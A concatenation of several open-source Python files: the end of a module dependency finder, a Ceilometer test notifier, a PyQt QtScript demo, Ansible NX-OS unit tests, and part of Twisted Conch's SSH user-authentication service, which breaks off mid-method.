m = self.import_module(head, mname, m)
if not m:
self.msgout(4, "raise ImportError: No module named", mname)
raise ImportError("No module named " + mname)
self.msgout(4, "load_tail ->", m)
return m
def ensure_fromlist(self, m, fromlist, recursive=0):
self.msg(4, "ensure_fromlist", m, fromlist, recursive)
for sub in fromlist:
if sub == "*":
if not recursive:
all = self.find_all_submodules(m)
if all:
self.ensure_fromlist(m, all, 1)
elif not hasattr(m, sub):
subname = "%s.%s" % (m.__name__, sub)
submod = self.import_module(sub, subname, m)
if not submod:
raise ImportError("No module named " + subname)
def find_all_submodules(self, m):
if not m.__path__:
return
modules = {}
# 'suffixes' used to be a list hardcoded to [".py", ".pyc", ".pyo"].
# But we must also collect Python extension modules - although
# we cannot separate normal dlls from Python extensions.
suffixes = []
for triple in imp.get_suffixes():
suffixes.append(triple[0])
for dir in m.__path__:
try:
names = os.listdir(dir)
except os.error:
self.msg(2, "can't list directory", dir)
continue
for name in names:
mod = None
for suff in suffixes:
n = len(suff)
if name[-n:] == suff:
mod = name[:-n]
break
if mod and mod != "__init__":
modules[mod] = mod
return modules.keys()
def import_module(self, partname, fqname, parent):
self.msgin(3, "import_module", partname, fqname, parent)
try:
m = self.modules[fqname]
except KeyError:
pass
else:
self.msgout(3, "import_module ->", m)
return m
if fqname in self.badmodules:
self.msgout(3, "import_module -> None")
return None
if parent and parent.__path__ is None:
self.msgout(3, "import_module -> None")
return None
try:
fp, pathname, stuff = self.find_module(partname,
parent and parent.__path__, parent)
except ImportError:
self.msgout(3, "import_module ->", None)
return None
try:
m = self.load_module(fqname, fp, pathname, stuff)
finally:
if fp: fp.close()
if parent:
setattr(parent, partname, m)
self.msgout(3, "import_module ->", m)
return m
def load_module(self, fqname, fp, pathname, file_info):
suffix, mode, type = file_info
self.msgin(2, "load_module", fqname, fp and "fp", pathname)
if type == imp.PKG_DIRECTORY:
m = self.load_package(fqname, pathname)
self.msgout(2, "load_module ->", m)
return m
if type == imp.PY_SOURCE:
co = compile(fp.read()+'\n', pathname, 'exec')
elif type == imp.PY_COMPILED:
if fp.read(4) != imp.get_magic():
self.msgout(2, "raise ImportError: Bad magic number", pathname)
raise ImportError("Bad magic number in %s" % pathname)
fp.read(4)
co = marshal.load(fp)
else:
co = None
m = self.add_module(fqname)
m.__file__ = pathname
if co:
if self.replace_paths:
co = self.replace_paths_in_code(co)
m.__code__ = co
self.scan_code(co, m)
self.msgout(2, "load_module ->", m)
return m
def _add_badmodule(self, name, caller):
if name not in self.badmodules:
self.badmodules[name] = {}
if caller:
self.badmodules[name][caller.__name__] = 1
else:
self.badmodules[name]["-"] = 1
def _safe_import_hook(self, name, caller, fromlist, level=-1):
# wrapper for self.import_hook() that won't raise ImportError
if name in self.badmodules:
self._add_badmodule(name, caller)
return
try:
self.import_hook(name, caller, level=level)
except ImportError as msg:
self.msg(2, "ImportError:", str(msg))
self._add_badmodule(name, caller)
else:
if fromlist:
for sub in fromlist:
if sub in self.badmodules:
self._add_badmodule(sub, caller)
continue
try:
self.import_hook(name, caller, [sub], level=level)
except ImportError as msg:
self.msg(2, "ImportError:", str(msg))
fullname = name + "." + sub
self._add_badmodule(fullname, caller)
def scan_opcodes(self, co,
unpack = struct.unpack):
# Scan the code, and yield 'interesting' opcode combinations
# Version for Python 2.4 and older
code = co.co_code
names = co.co_names
consts = co.co_consts
while code:
c = code[0]
if c in STORE_OPS:
oparg, = unpack('<H', code[1:3])
yield "store", (names[oparg],)
code = code[3:]
continue
if c == LOAD_CONST and code[3] == IMPORT_NAME:
oparg_1, oparg_2 = unpack('<xHxH', code[:6])
yield "import", (consts[oparg_1], names[oparg_2])
code = code[6:]
continue
if c >= HAVE_ARGUMENT:
code = code[3:]
else:
code = code[1:]
def scan_opcodes_25(self, co,
unpack = struct.unpack):
# Scan the code, and yield 'interesting' opcode combinations
# Python 2.5 version (has absolute and relative imports)
code = co.co_code
names = co.co_names
consts = co.co_consts
LOAD_LOAD_AND_IMPORT = LOAD_CONST + LOAD_CONST + IMPORT_NAME
while code:
c = bytes([code[0]])
if c in STORE_OPS:
oparg, = unpack('<H', code[1:3])
yield "store", (names[oparg],)
code = code[3:]
continue
if code[:9:3] == LOAD_LOAD_AND_IMPORT:
oparg_1, oparg_2, oparg_3 = unpack('<xHxHxH', code[:9])
level = consts[oparg_1]
if level == 0: # absolute import
yield "absolute_import", (consts[oparg_2], names[oparg_3])
else: # relative import
yield "relative_import", (level, consts[oparg_2], names[oparg_3])
code = code[9:]
continue
if c >= HAVE_ARGUMENT:
code = code[3:]
else:
code = code[1:]
def scan_code(self, co, m):
code = co.co_code
if sys.version_info >= (2, 5):
scanner = self.scan_opcodes_25
else:
scanner = self.scan_opcodes
for what, args in scanner(co):
if what == "store":
name, = args
m.globalnames[name] = 1
elif what == "absolute_import":
fromlist, name = args
have_star = 0
if fromlist is not None:
if "*" in fromlist:
have_star = 1
fromlist = [f for f in fromlist if f != "*"]
self._safe_import_hook(name, m, fromlist, level=0)
if have_star:
# We've encountered an "import *". If it is a Python module,
# the code has already been parsed and we can suck out the
# global names.
mm = None
if m.__path__:
# At this point we don't know whether 'name' is a
# submodule of 'm' or a global module. Let's just try
# the full name first.
mm = self.modules.get(m.__name__ + "." + name)
if mm is None:
mm = self.modules.get(name)
if mm is not None:
m.globalnames.update(mm.globalnames)
m.starimports.update(mm.starimports)
if mm.__code__ is None:
m.starimports[name] = 1
else:
m.starimports[name] = 1
elif what == "relative_import":
level, fromlist, name = args
if name:
self._safe_import_hook(name, m, fromlist, level=level)
else:
parent = self.determine_parent(m, level=level)
self._safe_import_hook(parent.__name__, None, fromlist, level=0)
else:
# We don't expect anything else from the generator.
raise RuntimeError(what)
for c in co.co_consts:
if isinstance(c, type(co)):
self.scan_code(c, m)
def load_package(self, fqname, pathname):
self.msgin(2, "load_package", fqname, pathname)
newname = replacePackageMap.get(fqname)
if newname:
fqname = newname
m = self.add_module(fqname)
m.__file__ = pathname
m.__path__ = [pathname]
# As per comment at top of file, simulate runtime __path__ additions.
m.__path__ = m.__path__ + packagePathMap.get(fqname, [])
fp, buf, stuff = self.find_module("__init__", m.__path__)
try:
self.load_module(fqname, fp, buf, stuff)
self.msgout(2, "load_package ->", m)
return m
finally:
if fp:
fp.close()
def add_module(self, fqname):
if fqname in self.modules:
return self.modules[fqname]
self.modules[fqname] = m = Module(fqname)
return m
def find_module(self, name, path, parent=None):
if parent is not None:
# assert path is not None
fullname = parent.__name__+'.'+name
else:
fullname = name
if fullname in self.excludes:
self.msgout(3, "find_module -> Excluded", fullname)
raise ImportError(name)
if path is None:
if name in sys.builtin_module_names:
return (None, None, ("", "", imp.C_BUILTIN))
path = self.path
return imp.find_module(name, path)
def report(self):
"""Print a report to stdout, listing the found modules with their
paths, as well as modules that are missing, or seem to be missing.
"""
print()
print(" %-25s %s" % ("Name", "File"))
print(" %-25s %s" % ("----", "----"))
# Print modules found
keys = sorted(self.modules.keys())
for key in keys:
m = self.modules[key]
if m.__path__:
print("P", end=' ')
else:
print("m", end=' ')
print("%-25s" % key, m.__file__ or "")
# Print missing modules
missing, maybe = self.any_missing_maybe()
if missing:
print()
print("Missing modules:")
for name in missing:
mods = sorted(self.badmodules[name].keys())
print("?", name, "imported from", ', '.join(mods))
# Print modules that may be missing, but then again, maybe not...
if maybe:
print()
print("Submodules thay appear to be missing, but could also be", end=' ')
print("global names in the parent package:")
for name in maybe:
mods = sorted(self.badmodules[name].keys())
print("?", name, "imported from", ', '.join(mods))
def any_missing(self):
"""Return a list of modules that appear to be missing. Use
any_missing_maybe() if you want to know which modules are
certain to be missing, and which *may* be missing.
"""
missing, maybe = self.any_missing_maybe()
return missing + maybe
def any_missing_maybe(self):
"""Return two lists, one with modules that are certainly missing
and one with modules that *may* be missing. The latter names could
either be submodules *or* just global names in the package.
The reason it can't always be determined is that it's impossible to
tell which names are imported when "from module import *" is done
with an extension module, short of actually importing it.
"""
missing = []
maybe = []
for name in self.badmodules:
if name in self.excludes:
continue
i = name.rfind(".")
if i < 0:
missing.append(name)
continue
subname = name[i+1:]
pkgname = name[:i]
pkg = self.modules.get(pkgname)
if pkg is not None:
if pkgname in self.badmodules[name]:
# The package tried to import this module itself and
# failed. It's definitely missing.
missing.append(name)
elif subname in pkg.globalnames:
# It's a global in the package: definitely not missing.
pass
elif pkg.starimports:
# It could be missing, but the package did an "import *"
# from a non-Python module, so we simply can't be sure.
maybe.append(name)
else:
# It's not a global in the package, the package didn't
# do funny star imports, it's very likely to be missing.
# The symbol could be inserted into the package from the
# outside, but since that's not good style we simply list
# it missing.
missing.append(name)
else:
missing.append(name)
missing.sort()
maybe.sort()
return missing, maybe
def replace_paths_in_code(self, co):
new_filename = original_filename = os.path.normpath(co.co_filename)
for f, r in self.replace_paths:
if original_filename.startswith(f):
new_filename = r + original_filename[len(f):]
break
if self.debug and original_filename not in self.processed_paths:
if new_filename != original_filename:
self.msgout(2, "co_filename %r changed to %r" \
% (original_filename,new_filename,))
else:
self.msgout(2, "co_filename %r remains unchanged" \
% (original_filename,))
self.processed_paths.append(original_filename)
consts = list(co.co_consts)
for i in range(len(consts)):
if isinstance(consts[i], type(co)):
consts[i] = self.replace_paths_in_code(consts[i])
return types.CodeType(co.co_argcount, co.co_nlocals, co.co_stacksize,
co.co_flags, co.co_code, tuple(consts), co.co_names,
co.co_varnames, new_filename, co.co_name,
co.co_firstlineno, co.co_lnotab,
co.co_freevars, co.co_cellvars)
def test():
# Parse command line
import getopt
try:
opts, args = getopt.getopt(sys.argv[1:], "dmp:qx:")
except getopt.error as msg:
print(msg)
return
# Process options
debug = 1
domods = 0
addpath = []
exclude = []
for o, a in opts:
if o == '-d':
debug = debug + 1
if o == '-m':
domods = 1
if o == '-p':
addpath = addpath + a.split(os.pathsep)
if o == '-q':
debug = 0
if o == '-x':
exclude.append(a)
# Provide default arguments
if not args:
script = "hello.py"
else:
script = args[0]
# Set the path based on sys.path and the script directory
path = sys.path[:]
path[0] = os.path.dirname(script)
path = addpath + path
if debug > 1:
print("path:")
for item in path:
print(" ", repr(item))
# Create the module finder and turn its crank
mf = ModuleFinder(path, debug, exclude)
for arg in args[1:]:
if arg == '-m':
domods = 1
continue
if domods:
if arg[-2:] == '.*':
mf.import_hook(arg[:-2], None, ["*"])
else:
mf.import_hook(arg)
else:
mf.load_file(arg)
mf.run_script(script)
mf.report()
return mf # for -i debugging
if __name__ == '__main__':
try:
mf = test()
except KeyboardInterrupt:
print("\n[interrupt]")
| apache-2.0 |
maestro-hybrid-cloud/ceilometer | ceilometer/alarm/notifier/test.py | 11 | 1257 | #
# Copyright 2013 eNovance
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test alarm notifier."""
from ceilometer.alarm import notifier
class TestAlarmNotifier(notifier.AlarmNotifier):
"Test alarm notifier."""
def __init__(self):
self.notifications = []
def notify(self, action, alarm_id, alarm_name, severity,
previous, current, reason, reason_data):
self.notifications.append((action,
alarm_id,
alarm_name,
severity,
previous,
current,
reason,
reason_data))
| apache-2.0 |
antont/tundra | src/Application/JavascriptModule/proto/qtscript_test.py | 1 | 2402 | """a pyqt test app that embeds javascript using QtScript,
defines qt properties and slots in py, and exposes them to js"""
import sys
from PyQt4 import QtGui, QtCore
from PyQt4.QtScript import QScriptEngine, QScriptValue
from PyQt4.QtCore import QObject, pyqtSignature, pyqtProperty, QVariant, QTimer
ps1 = ">>> "
ps2 = "... "
def printhello():
print "Hello."
app = QtGui.QApplication(sys.argv)
window = QtGui.QWidget()
# Create our main window using a plain QWidget.
window.setWindowTitle("Signals")
# Set our window's title as "Signals".
button = QtGui.QPushButton("Press", window)
# Create, with "Press" as its caption,
# a child button in the window.
# By specifying a parent object,
# this new widget is automatically added to the same.
button.resize(200, 40)
# Resize our button to (200, 40) -> (X, Y)
"""old style signals, works in pyqt 4.4"""
#button.connect(button, QtCore.SIGNAL("clicked()"), printhello) #QtCore.SLOT("quit()"))
#new style signals in 4.5, must upgdate to get these
button.clicked.connect(printhello)
# Connect the button's click signal to the QApplication's quit() slot.
window.show()
# Show our window.
class Python(QObject):
def __init__(self):
QObject.__init__(self)
self.setObjectName("python")
# Does not work as expected :(
self.setProperty("app", QVariant(self))
self.t = QTimer(self)
self.t.setObjectName("timer")
@pyqtSignature("QString")
def hello(self, name):
print "Hello,", name
def get_test(self):
return 123
test = pyqtProperty("int", get_test)
engine = QScriptEngine()
engine.evaluate("function dir(obj) { for(o in obj) print(o); }")
py = Python()
spy = engine.newQObject(py)
engine.globalObject().setProperty("python", spy)
#app.exec_()
print "Ctrl+D to quit"
prompt = ps1
code = ""
while True:
app.processEvents()
line = raw_input(prompt)
if not line.strip():
continue
code = code + line + "\n"
if engine.canEvaluate(code):
result = engine.evaluate(code)
if engine.hasUncaughtException():
bt = engine.uncaughtExceptionBacktrace()
print "Traceback:"
print "\n".join([" %s" % l for l in list(bt)])
print engine.uncaughtException().toString()
else:
print result.toString()
code = ""
prompt = ps1
else:
prompt = ps2
| apache-2.0 |
pchauncey/ansible | test/units/modules/network/nxos/test_nxos_vxlan_vtep.py | 47 | 2418 | # (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from ansible.compat.tests.mock import patch
from ansible.modules.network.nxos import nxos_vxlan_vtep
from .nxos_module import TestNxosModule, load_fixture, set_module_args
class TestNxosVxlanVtepVniModule(TestNxosModule):
module = nxos_vxlan_vtep
def setUp(self):
self.mock_load_config = patch('ansible.modules.network.nxos.nxos_vxlan_vtep.load_config')
self.load_config = self.mock_load_config.start()
self.mock_get_config = patch('ansible.modules.network.nxos.nxos_vxlan_vtep.get_config')
self.get_config = self.mock_get_config.start()
def tearDown(self):
self.mock_get_config.stop()
self.mock_load_config.stop()
def load_fixtures(self, commands=None, device=''):
self.get_config.return_value = load_fixture('nxos_vxlan_vtep', 'config.cfg')
self.load_config.return_value = None
def test_nxos_vxlan_vtep(self):
set_module_args(dict(interface='nve1', description='simple description'))
self.execute_module(changed=True, commands=['interface nve1', 'description simple description'])
def test_nxos_vxlan_vtep_present_no_change(self):
set_module_args(dict(interface='nve1'))
self.execute_module(changed=False, commands=[])
def test_nxos_vxlan_vtep_absent(self):
set_module_args(dict(interface='nve1', state='absent'))
self.execute_module(changed=True, commands=['no interface nve1'])
def test_nxos_vxlan_vtep_absent_no_change(self):
set_module_args(dict(interface='nve2', state='absent'))
self.execute_module(changed=False, commands=[])
| gpl-3.0 |
moijes12/oh-mainline | vendor/packages/twisted/twisted/conch/ssh/userauth.py | 17 | 30482 | # -*- test-case-name: twisted.conch.test.test_userauth -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Implementation of the ssh-userauth service.
Currently implemented authentication types are public-key and password.
Maintainer: Paul Swartz
"""
import struct, warnings
from twisted.conch import error, interfaces
from twisted.conch.ssh import keys, transport, service
from twisted.conch.ssh.common import NS, getNS
from twisted.cred import credentials
from twisted.cred.error import UnauthorizedLogin
from twisted.internet import defer, reactor
from twisted.python import failure, log
class SSHUserAuthServer(service.SSHService):
"""
A service implementing the server side of the 'ssh-userauth' service. It
is used to authenticate the user on the other side as being able to access
this server.
@ivar name: the name of this service: 'ssh-userauth'
@type name: C{str}
@ivar authenticatedWith: a list of authentication methods that have
already been used.
@type authenticatedWith: C{list}
@ivar loginTimeout: the number of seconds we wait before disconnecting
the user for taking too long to authenticate
@type loginTimeout: C{int}
@ivar attemptsBeforeDisconnect: the number of failed login attempts we
allow before disconnecting.
@type attemptsBeforeDisconnect: C{int}
@ivar loginAttempts: the number of login attempts that have been made
@type loginAttempts: C{int}
@ivar passwordDelay: the number of seconds to delay when the user gives
an incorrect password
@type passwordDelay: C{int}
@ivar interfaceToMethod: a C{dict} mapping credential interfaces to
authentication methods. The server checks to see which of the
cred interfaces have checkers and tells the client that those methods
are valid for authentication.
@type interfaceToMethod: C{dict}
@ivar supportedAuthentications: A list of the supported authentication
methods.
@type supportedAuthentications: C{list} of C{str}
@ivar user: the last username the client tried to authenticate with
@type user: C{str}
@ivar method: the current authentication method
@type method: C{str}
@ivar nextService: the service the user wants started after authentication
has been completed.
@type nextService: C{str}
@ivar portal: the L{twisted.cred.portal.Portal} we are using for
authentication
@type portal: L{twisted.cred.portal.Portal}
@ivar clock: an object with a callLater method. Stubbed out for testing.
"""
name = 'ssh-userauth'
loginTimeout = 10 * 60 * 60
# 10 minutes before we disconnect them
attemptsBeforeDisconnect = 20
# 20 login attempts before a disconnect
passwordDelay = 1 # number of seconds to delay on a failed password
clock = reactor
interfaceToMethod = {
credentials.ISSHPrivateKey : 'publickey',
credentials.IUsernamePassword : 'password',
credentials.IPluggableAuthenticationModules : 'keyboard-interactive',
}
def serviceStarted(self):
"""
Called when the userauth service is started. Set up instance
variables, check if we should allow password/keyboard-interactive
authentication (only allow if the outgoing connection is encrypted) and
set up a login timeout.
"""
self.authenticatedWith = []
self.loginAttempts = 0
self.user = None
self.nextService = None
self._pamDeferred = None
self.portal = self.transport.factory.portal
self.supportedAuthentications = []
for i in self.portal.listCredentialsInterfaces():
if i in self.interfaceToMethod:
self.supportedAuthentications.append(self.interfaceToMethod[i])
if not self.transport.isEncrypted('in'):
# don't let us transport password in plaintext
if 'password' in self.supportedAuthentications:
self.supportedAuthentications.remove('password')
if 'keyboard-interactive' in self.supportedAuthentications:
self.supportedAuthentications.remove('keyboard-interactive')
self._cancelLoginTimeout = self.clock.callLater(
self.loginTimeout,
self.timeoutAuthentication)
def serviceStopped(self):
"""
Called when the userauth service is stopped. Cancel the login timeout
if it's still going.
"""
if self._cancelLoginTimeout:
self._cancelLoginTimeout.cancel()
self._cancelLoginTimeout = None
def timeoutAuthentication(self):
"""
Called when the user has timed out on authentication. Disconnect
with a DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE message.
"""
self._cancelLoginTimeout = None
self.transport.sendDisconnect(
transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
'you took too long')
def tryAuth(self, kind, user, data):
"""
Try to authenticate the user with the given method. Dispatches to a
auth_* method.
@param kind: the authentication method to try.
@type kind: C{str}
@param user: the username the client is authenticating with.
@type user: C{str}
@param data: authentication specific data sent by the client.
@type data: C{str}
@return: A Deferred called back if the method succeeded, or erred back
if it failed.
@rtype: C{defer.Deferred}
"""
log.msg('%s trying auth %s' % (user, kind))
if kind not in self.supportedAuthentications:
return defer.fail(
error.ConchError('unsupported authentication, failing'))
kind = kind.replace('-', '_')
f = getattr(self,'auth_%s'%kind, None)
if f:
ret = f(data)
if not ret:
return defer.fail(
error.ConchError('%s return None instead of a Deferred'
% kind))
else:
return ret
return defer.fail(error.ConchError('bad auth type: %s' % kind))
def ssh_USERAUTH_REQUEST(self, packet):
"""
The client has requested authentication. Payload::
string user
string next service
string method
<authentication specific data>
@type packet: C{str}
"""
user, nextService, method, rest = getNS(packet, 3)
if user != self.user or nextService != self.nextService:
self.authenticatedWith = [] # clear auth state
self.user = user
self.nextService = nextService
self.method = method
d = self.tryAuth(method, user, rest)
if not d:
self._ebBadAuth(
failure.Failure(error.ConchError('auth returned none')))
return
d.addCallback(self._cbFinishedAuth)
d.addErrback(self._ebMaybeBadAuth)
d.addErrback(self._ebBadAuth)
return d
def _cbFinishedAuth(self, (interface, avatar, logout)):
"""
The callback when user has successfully been authenticated. For a
description of the arguments, see L{twisted.cred.portal.Portal.login}.
We start the service requested by the user.
"""
self.transport.avatar = avatar
self.transport.logoutFunction = logout
service = self.transport.factory.getService(self.transport,
self.nextService)
if not service:
raise error.ConchError('could not get next service: %s'
% self.nextService)
log.msg('%s authenticated with %s' % (self.user, self.method))
self.transport.sendPacket(MSG_USERAUTH_SUCCESS, '')
self.transport.setService(service())
def _ebMaybeBadAuth(self, reason):
"""
An intermediate errback. If the reason is
error.NotEnoughAuthentication, we send a MSG_USERAUTH_FAILURE, but
with the partial success indicator set.
@type reason: L{twisted.python.failure.Failure}
"""
reason.trap(error.NotEnoughAuthentication)
self.transport.sendPacket(MSG_USERAUTH_FAILURE,
NS(','.join(self.supportedAuthentications)) + '\xff')
def _ebBadAuth(self, reason):
"""
The final errback in the authentication chain. If the reason is
error.IgnoreAuthentication, we simply return; the authentication
method has sent its own response. Otherwise, send a failure message
and (if the method is not 'none') increment the number of login
attempts.
@type reason: L{twisted.python.failure.Failure}
"""
if reason.check(error.IgnoreAuthentication):
return
if self.method != 'none':
log.msg('%s failed auth %s' % (self.user, self.method))
if reason.check(UnauthorizedLogin):
log.msg('unauthorized login: %s' % reason.getErrorMessage())
elif reason.check(error.ConchError):
log.msg('reason: %s' % reason.getErrorMessage())
else:
log.msg(reason.getTraceback())
self.loginAttempts += 1
if self.loginAttempts > self.attemptsBeforeDisconnect:
self.transport.sendDisconnect(
transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
'too many bad auths')
return
self.transport.sendPacket(
MSG_USERAUTH_FAILURE,
NS(','.join(self.supportedAuthentications)) + '\x00')
def auth_publickey(self, packet):
"""
Public key authentication. Payload::
byte has signature
string algorithm name
string key blob
[string signature] (if has signature is True)
Create a SSHPublicKey credential and verify it using our portal.
"""
hasSig = ord(packet[0])
algName, blob, rest = getNS(packet[1:], 2)
pubKey = keys.Key.fromString(blob)
signature = hasSig and getNS(rest)[0] or None
if hasSig:
b = (NS(self.transport.sessionID) + chr(MSG_USERAUTH_REQUEST) +
NS(self.user) + NS(self.nextService) + NS('publickey') +
chr(hasSig) + NS(pubKey.sshType()) + NS(blob))
c = credentials.SSHPrivateKey(self.user, algName, blob, b,
signature)
return self.portal.login(c, None, interfaces.IConchUser)
else:
c = credentials.SSHPrivateKey(self.user, algName, blob, None, None)
return self.portal.login(c, None,
interfaces.IConchUser).addErrback(self._ebCheckKey,
packet[1:])
def _ebCheckKey(self, reason, packet):
"""
Called back if the user did not sent a signature. If reason is
error.ValidPublicKey then this key is valid for the user to
authenticate with. Send MSG_USERAUTH_PK_OK.
"""
reason.trap(error.ValidPublicKey)
# if we make it here, it means that the publickey is valid
self.transport.sendPacket(MSG_USERAUTH_PK_OK, packet)
return failure.Failure(error.IgnoreAuthentication())
def auth_password(self, packet):
"""
Password authentication. Payload::
string password
Make a UsernamePassword credential and verify it with our portal.
"""
password = getNS(packet[1:])[0]
c = credentials.UsernamePassword(self.user, password)
return self.portal.login(c, None, interfaces.IConchUser).addErrback(
self._ebPassword)
def _ebPassword(self, f):
"""
If the password is invalid, wait before sending the failure in order
to delay brute-force password guessing.
"""
d = defer.Deferred()
self.clock.callLater(self.passwordDelay, d.callback, f)
return d
def auth_keyboard_interactive(self, packet):
"""
Keyboard interactive authentication. No payload. We create a
PluggableAuthenticationModules credential and authenticate with our
portal.
"""
if self._pamDeferred is not None:
self.transport.sendDisconnect(
transport.DISCONNECT_PROTOCOL_ERROR,
"only one keyboard interactive attempt at a time")
return defer.fail(error.IgnoreAuthentication())
c = credentials.PluggableAuthenticationModules(self.user,
self._pamConv)
return self.portal.login(c, None, interfaces.IConchUser)
def _pamConv(self, items):
"""
Convert a list of PAM authentication questions into a
MSG_USERAUTH_INFO_REQUEST. Returns a Deferred that will be called
back when the user has responses to the questions.
@param items: a list of 2-tuples (message, kind). We only care about
kinds 1 (password) and 2 (text).
@type items: C{list}
@rtype: L{defer.Deferred}
"""
resp = []
for message, kind in items:
if kind == 1: # password
resp.append((message, 0))
elif kind == 2: # text
resp.append((message, 1))
elif kind in (3, 4):
return defer.fail(error.ConchError(
'cannot handle PAM 3 or 4 messages'))
else:
return defer.fail(error.ConchError(
'bad PAM auth kind %i' % kind))
packet = NS('') + NS('') + NS('')
packet += struct.pack('>L', len(resp))
for prompt, echo in resp:
packet += NS(prompt)
packet += chr(echo)
self.transport.sendPacket(MSG_USERAUTH_INFO_REQUEST, packet)
self._pamDeferred = defer.Deferred()
return self._pamDeferred
def ssh_USERAUTH_INFO_RESPONSE(self, packet):
"""
The user has responded with answers to PAMs authentication questions.
Parse the packet into a PAM response and callback self._pamDeferred.
Payload::
uint32 numer of responses
string response 1
...
string response n
"""
d, self._pamDeferred = self._pamDeferred, None
try:
resp = []
numResps = struct.unpack('>L', packet[:4])[0]
packet = packet[4:]
while len(resp) < numResps:
response, packet = getNS(packet)
resp.append((response, 0))
if packet:
raise error.ConchError("%i bytes of extra data" % len(packet))
except:
d.errback(failure.Failure())
else:
d.callback(resp)
class SSHUserAuthClient(service.SSHService):
"""
A service implementing the client side of 'ssh-userauth'.
@ivar name: the name of this service: 'ssh-userauth'
@type name: C{str}
@ivar preferredOrder: a list of authentication methods we support, in
order of preference. The client will try authentication methods in
this order, making callbacks for information when necessary.
@type preferredOrder: C{list}
@ivar user: the name of the user to authenticate as
@type user: C{str}
@ivar instance: the service to start after authentication has finished
@type instance: L{service.SSHService}
@ivar authenticatedWith: a list of strings of authentication methods we've tried
@type authenticatedWith: C{list} of C{str}
@ivar triedPublicKeys: a list of public key objects that we've tried to
authenticate with
@type triedPublicKeys: C{list} of L{Key}
@ivar lastPublicKey: the last public key object we've tried to authenticate
with
@type lastPublicKey: L{Key}
"""
name = 'ssh-userauth'
preferredOrder = ['publickey', 'password', 'keyboard-interactive']
def __init__(self, user, instance):
self.user = user
self.instance = instance
def serviceStarted(self):
self.authenticatedWith = []
self.triedPublicKeys = []
self.lastPublicKey = None
self.askForAuth('none', '')
def askForAuth(self, kind, extraData):
"""
Send a MSG_USERAUTH_REQUEST.
@param kind: the authentication method to try.
@type kind: C{str}
@param extraData: method-specific data to go in the packet
@type extraData: C{str}
"""
self.lastAuth = kind
self.transport.sendPacket(MSG_USERAUTH_REQUEST, NS(self.user) +
NS(self.instance.name) + NS(kind) + extraData)
def tryAuth(self, kind):
"""
Dispatch to an authentication method.
@param kind: the authentication method
@type kind: C{str}
"""
kind = kind.replace('-', '_')
log.msg('trying to auth with %s' % (kind,))
f = getattr(self,'auth_%s' % (kind,), None)
if f:
return f()
def _ebAuth(self, ignored, *args):
"""
Generic callback for a failed authentication attempt. Respond by
asking for the list of accepted methods (the 'none' method)
"""
self.askForAuth('none', '')
def ssh_USERAUTH_SUCCESS(self, packet):
"""
We received a MSG_USERAUTH_SUCCESS. The server has accepted our
authentication, so start the next service.
"""
self.transport.setService(self.instance)
def ssh_USERAUTH_FAILURE(self, packet):
"""
We received a MSG_USERAUTH_FAILURE. Payload::
string methods
byte partial success
If partial success is C{True}, then the previous method succeeded but is
not sufficent for authentication. C{methods} is a comma-separated list
of accepted authentication methods.
We sort the list of methods by their position in C{self.preferredOrder},
removing methods that have already succeeded. We then call
C{self.tryAuth} with the most preferred method.
@param packet: the L{MSG_USERAUTH_FAILURE} payload.
@type packet: C{str}
@return: a L{defer.Deferred} that will be callbacked with C{None} as
soon as all authentication methods have been tried, or C{None} if no
more authentication methods are available.
@rtype: C{defer.Deferred} or C{None}
"""
canContinue, partial = getNS(packet)
partial = ord(partial)
if partial:
self.authenticatedWith.append(self.lastAuth)
def orderByPreference(meth):
"""
Invoked once per authentication method in order to extract a
comparison key which is then used for sorting.
@param meth: the authentication method.
@type meth: C{str}
@return: the comparison key for C{meth}.
@rtype: C{int}
"""
if meth in self.preferredOrder:
return self.preferredOrder.index(meth)
else:
# put the element at the end of the list.
return len(self.preferredOrder)
canContinue = sorted([meth for meth in canContinue.split(',')
if meth not in self.authenticatedWith],
key=orderByPreference)
log.msg('can continue with: %s' % canContinue)
return self._cbUserauthFailure(None, iter(canContinue))
def _cbUserauthFailure(self, result, iterator):
if result:
return
try:
method = iterator.next()
except StopIteration:
self.transport.sendDisconnect(
transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
'no more authentication methods available')
else:
d = defer.maybeDeferred(self.tryAuth, method)
d.addCallback(self._cbUserauthFailure, iterator)
return d
def ssh_USERAUTH_PK_OK(self, packet):
"""
This message (number 60) can mean several different messages depending
on the current authentication type. We dispatch to individual methods
in order to handle this request.
"""
func = getattr(self, 'ssh_USERAUTH_PK_OK_%s' %
self.lastAuth.replace('-', '_'), None)
if func is not None:
return func(packet)
else:
self.askForAuth('none', '')
def ssh_USERAUTH_PK_OK_publickey(self, packet):
"""
This is MSG_USERAUTH_PK. Our public key is valid, so we create a
signature and try to authenticate with it.
"""
publicKey = self.lastPublicKey
b = (NS(self.transport.sessionID) + chr(MSG_USERAUTH_REQUEST) +
NS(self.user) + NS(self.instance.name) + NS('publickey') +
'\xff' + NS(publicKey.sshType()) + NS(publicKey.blob()))
d = self.signData(publicKey, b)
if not d:
self.askForAuth('none', '')
# this will fail, we'll move on
return
d.addCallback(self._cbSignedData)
d.addErrback(self._ebAuth)
def ssh_USERAUTH_PK_OK_password(self, packet):
"""
This is MSG_USERAUTH_PASSWD_CHANGEREQ. The password given has expired.
We ask for an old password and a new password, then send both back to
the server.
"""
prompt, language, rest = getNS(packet, 2)
self._oldPass = self._newPass = None
d = self.getPassword('Old Password: ')
